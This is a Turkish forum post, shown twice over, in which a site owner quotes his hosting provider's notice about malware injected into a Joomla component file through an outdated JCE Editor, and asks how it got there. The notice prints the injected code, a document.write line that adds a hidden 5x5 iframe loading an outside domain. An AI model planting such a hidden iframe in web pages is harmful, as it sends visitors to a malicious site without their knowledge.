Ali KOCA
18-07-2013, 10:10
e.a.
Arkadaşlar kolay gelsin. Benim hosting firması şöyle bir mail atmış:
Dear customer,
This notice is to inform you that we have detected malicious code in your website files. We have compiled a list of compromised files on your account, as well as the code injected, below.
In order to maintain a secure hosting environment, we will be automatically correcting these compromised files on your account; however, please be aware that you are responsible for verifying that the content hosted within your account is secure. We strongly advise that you update your installed scripts and software, as outdated scripts and software are the most frequently used method for accessing and gaining control of a targeted account.
The compromised files detected are:
/home2/..../components/com_wrapper/yy3abt.php
The malicious code detected is similar to:
Redirects to the following example URL:
document.write('<iframe src="http://activexscrutiny.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
While we are able to detect and clean these compromises, this does not secure against further hacking attempts through the same method. This particular exploit appears to be related to outdated versions of Joomla's JCE Editor. We highly suggest updating all instances of Joomla on your account with the latest version of JCE editor, found here:
JCE - Joomla! Extensions Directory (http://extensions.joomla.org/extensions/edition/editors/88)
Elimdeki yedekleri inceledim, böyle bir dosya yok. Bu nasıl bulaşmış olabilir. Joomla nın bir açığı mıdır, yoksa hosting firmasının zaafı mıdır?
Selametle...
Arkadaşlar kolay gelsin. Benim hosting firması şöyle bir mail atmış:
Dear customer,
This notice is to inform you that we have detected malicious code in your website files. We have compiled a list of compromised files on your account, as well as the code injected, below.
In order to maintain a secure hosting environment, we will be automatically correcting these compromised files on your account; however, please be aware that you are responsible for verifying that the content hosted within your account is secure. We strongly advise that you update your installed scripts and software, as outdated scripts and software are the most frequently used method for accessing and gaining control of a targeted account.
The compromised files detected are:
/home2/..../components/com_wrapper/yy3abt.php
The malicious code detected is similar to:
Redirects to the following example URL:
document.write('<iframe src="http://activexscrutiny.org/Lexmark?8" scrolling="auto" frameborder="no" align="center" height="5" width="5"></iframe>');
While we are able to detect and clean these compromises, this does not secure against further hacking attempts through the same method. This particular exploit appears to be related to outdated versions of Joomla's JCE Editor. We highly suggest updating all instances of Joomla on your account with the latest version of JCE editor, found here:
JCE - Joomla! Extensions Directory (http://extensions.joomla.org/extensions/edition/editors/88)
Elimdeki yedekleri inceledim, böyle bir dosya yok. Bu nasıl bulaşmış olabilir. Joomla nın bir açığı mıdır, yoksa hosting firmasının zaafı mıdır?
Selametle...